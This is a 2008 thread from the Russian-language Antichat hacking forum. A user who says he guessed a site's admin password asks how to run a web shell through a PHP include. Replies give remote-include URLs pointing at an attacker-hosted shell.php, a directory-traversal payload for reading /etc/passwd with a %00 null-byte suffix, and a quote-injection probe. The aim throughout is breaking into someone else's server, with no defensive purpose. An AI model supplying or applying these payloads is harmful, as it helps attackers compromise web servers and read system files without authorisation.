Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
PHP includ Как выполнить шелл? |
15.01.2008, 00:50
|
|
Познающий
Регистрация: 11.01.2008
Сообщений: 98
Провел на форуме:
167749
Репутация:
4
|
|
PHP includ Как выполнить шелл?
Подскажите как залить шел:
Подобрал пароль к админке. Там есть приблизительно такой вызов скрипта:
http://www.hacksite.com/index.php?id?page=user024.php
Я сделал так:
http://www.hacksite.com/index.php?id&page=http://www.site.com/shell.php
Как теперь сделать чтобы у меня был доступ к файлам атакуемого сервера? А то я вижу только свой сервер, свои файлы?
|
|
|
15.01.2008, 00:56
|
|
Участник форума
Регистрация: 28.10.2007
Сообщений: 143
Провел на форуме:
913233
Репутация:
162
|
|
Сообщение от Nicca
Я сделал так:
http://www.hacksite.com/index.php?id&page=http://www.site.com/shell.php
если так не получилось может быть это локальный инклюд... попробуй залить шелл и потом его про инклюдить...
|
|
|
|
15.01.2008, 00:59
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
xXvladXx бред, читай что тс написал
Nicca на каком хосте находится твой шелл.. это раз, второе - не в фрейме опенится ссыль?
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
15.01.2008, 01:10
|
|
Участник форума
Регистрация: 16.06.2006
Сообщений: 179
Провел на форуме:
515368
Репутация:
135
|
|
Сообщение от xXvladXx
если так не получилось может быть это локальный инклюд... попробуй залить шелл и потом его про инклюдить...
чел, ты хоть сам понял что написал? если ты зальёшь шелл, нахрена его потом инклудить?
Последний раз редактировалось FraiDex; 15.01.2008 в 01:16..
|
|
|
|
15.01.2008, 01:15
|
|
Познающий
Регистрация: 11.01.2008
Сообщений: 98
Провел на форуме:
167749
Репутация:
4
|
|
Сообщение от blackybr
xXvladXx бред, читай что тс написал
Nicca на каком хосте находится твой шелл.. это раз, второе - не в фрейме опенится ссыль?
1. .freehostia.com
2.Опенится во фрейме!
|
|
|
|
15.01.2008, 01:18
|
|
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
Сообщение от FraiDex
чел, ты хоть сам понял что написал? если ты зальёшь шелл шелл, нахрена его потом инклудить?
если ты зальешь шелл просто как файл /*без права на исполнение: картинка, видео, текст.. а потом локально инклюдить*/
но у тс скорее всего просто ифрейм.. /*судя по тому, что он видит файлы того сервера, где залит шелл*/
тс, попробуй проинклюдить /еtc/passwd или что-то другое не доступное через ифрейм
*добавлено
если ифрем, то это не инклуд))) ищи другие баги или попробуй через заливку /*картинок, банеров, темплейтов и других фалов*/, попробуй редактирование страниц, тепмлейтов
Последний раз редактировалось halkfild; 15.01.2008 в 01:20..
|
|
|
|
15.01.2008, 01:18
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
если во фрейме, то ничего не поделаешь. скорее всего просто открывается
<frame src="http://shell.com/shell.php">
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
15.01.2008, 01:27
|
|
Познающий
Регистрация: 11.01.2008
Сообщений: 98
Провел на форуме:
167749
Репутация:
4
|
|
Как исккать /еtc/passwd?
к UsrPage= Добавлять ../etc/passwd ?
Как я тогда его увижу? Сдесь не выводятся\ сообщения об ошибках пробовал:
UsrPage= .sfsd.f2r2 выводит страницу по дефолту. Ошибки нет.
Если я наткнусь на /etc/passwd то выведит ли мне его на страницу?
|
|
|
|
15.01.2008, 17:58
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Что вы вообще такое говрите))? У меня была ткая же фигня..твой хость скорее всего поодерживает php, поэтому и не выполняется...нужен хост, где нету php...например: www.nm.ru
А что бы читать содержимое надо сделать так)):
http://www.hacksite.com/index.php?id&page=../etc/passwd
И потом побольше ../ не бойся с ними переборжить...этоне страшно..то ест запрос будет выглядеть так:
http://www.hacksite.com/index.php?id&page=../../../../../../../../../../../../../../../etc/passwd
Если есть ошибка и там написано например: ошибка иинкюда ../../../../../../../../../../../../../../../etc/passwd.php
То надо просто после passwd поставить %00
То есть вот так http://www.hacksite.com/index.php?id&page=../../../../../../../../../../../../../../../etc/passwd
Если написана просто ошибка, то возможно надо больше ../
А если и это не поможт, значит инклюд невозможен
|
|
|
|
15.01.2008, 18:11
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154
Репутация:
126
|
|
да вожможно у него там даже нет ни какого инклуда попробуй подставить ковычку после http://www.hacksite.com/index.php?id&page=' и посмотри что у тебя получится
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
